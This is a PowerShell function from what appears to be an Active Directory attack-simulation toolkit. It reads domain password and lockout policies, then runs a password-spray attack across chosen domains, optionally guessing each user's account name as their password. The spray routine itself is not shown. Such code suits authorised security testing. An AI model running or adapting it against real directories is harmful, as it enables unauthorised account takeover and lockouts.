Private/New-UserManipulation.ps1
|
function New-UserManipulation { $CurrentFunction = Get-FunctionName Write-Log -Message "### Start Function $CurrentFunction ###" $StartRunTime = (Get-Date).ToString($Script:DateFormatLog) #################### main code | out- host ##################### $Forest = Get-ADForest $Script:DoaminTypes = Get-DomainType $AllDomainsDetails = $Forest.Domains | ForEach-Object { Get-DomainPWDetails -DomainName $_ } Write-Host "`nCurrent Domain Settings:" -ForegroundColor $Script:FGCHighLight $AllDomainsDetails | Select-Object ` @{N = 'Domain'; E = { $_.NetBIOSName } }, @{N = 'DomainType'; E = { $_.DomainType } }, @{N = 'Enabled Users'; E = { $_.EnabledUser } }, @{N = 'Min. Pw Length'; E = { $_.MinPasswordLength } }, @{N = 'Complexity'; E = { $_.ComplexityEnabled } }, @{N = 'Lockout Threshold'; E = { $_.LockoutThreshold } }, @{N = 'Lockout Duration'; E = { $_.LockoutDuration } }, @{N = 'LockWin'; E = { $_.LockoutObservationWindow } }, @{N = 'RevEnc'; E = { $_.ReversibleEncryptionEnabled } }, @{N = 'FQDN'; E = { $_.DomainFQDN } } | Format-Table -AutoSize [int] $NoLT = ($AllDomainsDetails | Where-Object { $null -ne $_.LockoutThreshold -and $_.LockoutThreshold -gt 0 } | Measure-Object -Property LockoutThreshold -Minimum).Minimum $DomainSearchBase = Set-AttackScope -Action "User Manipulation" If ($DomainSearchBase -eq "SKIP") { return } $NewRandomPW = Get-RandomPassword If (-not $UnAttended) { $title = "Confirm or change the random password" $message = "The current password is: $NewRandomPW" $Options = @( [pscustomobject] @{ Label = "&Keep" Help = "Keep the random password '$NewRandomPW' regarding the password reset." Value = $Script:Yes }, [pscustomobject] @{ Label = "&Change" Help = "Enter a different password regarding the password reset." Value = "Change" } ) $prompt = Show-DecisionPrompt -Message $message -Options $Options -Default 0 -Title $title if ($prompt -ne $Script:Yes) { do { $NewRandomPW = Read-Host "`n Enter new password" if ([string]::IsNullOrWhiteSpace($NewRandomPW)) { Invoke-Output -Type Warning -Message "Please enter at least one character!" } } while ([string]::IsNullOrWhiteSpace($NewRandomPW)) Set-KeyValue -key "LastPW" -NewValue $NewRandomPW } } If (-not $UnAttended) { $title = "Attack Phase - $($Script:Phase04.toupper()) - starts now ..." $message = "Also test each user's samAccountName as a potential password?" $Options = @( [pscustomobject] @{ Label = "&Yes" Help = "Two password attempts will be performed per user:`n 1. The configured password`n 2. The user's samAccountName" Value = $Script:Yes }, [pscustomobject] @{ Label = "&No" Help = "Only the configured password will be tested." Value = $Script:No }, [pscustomobject] @{ Label = "&Cancel" Help = "Cancel whole password spray." Value = "Skip" } ) $decision = Show-DecisionPrompt -Message $message -Options $Options -Default 0 -Title $title } else { $decision = $Script:Yes } If ($decision -eq $Script:Yes) { $IncludeSamAccountNameAsPassword = $true } elseif ($decision -eq $Script:No) { $IncludeSamAccountNameAsPassword = $false } else { Invoke-Output -Type Success -Message "Password Spray cancelled by user." return } If ($DomainSearchBase -eq "All Domains in Forest") { $domains = (Get-ADForest).Domains foreach ($domain in $domains) { $DomainSearchBase = (Get-ADDomain -Server $domain).DistinguishedName $runtime = Measure-Command { Start-PasswordSprayAttack -SearchBase $DomainSearchBase -Password $NewRandomPW -Server $domain -IncludeSamAccountNameAsPassword:$IncludeSamAccountNameAsPassword } Write-log -Message "Finished in $($runtime.TotalSeconds) seconds." } } else { $server = Get-BestDomainController -domain $DomainSearchBase $runtime = Measure-Command { Start-PasswordSprayAttack -SearchBase $DomainSearchBase -Password $NewRandomPW -Server $server -IncludeSamAccountNameAsPassword:$IncludeSamAccountNameAsPassword } Write-log -Message "Finished in $($runtime.TotalSeconds) seconds." } ######################## main code ############################ $runtime = Get-RunTime -StartRunTime $StartRunTime Write-Log -Message " Run Time: $runtime [h] ###" Write-Log -Message "### End Function $CurrentFunction ###" } |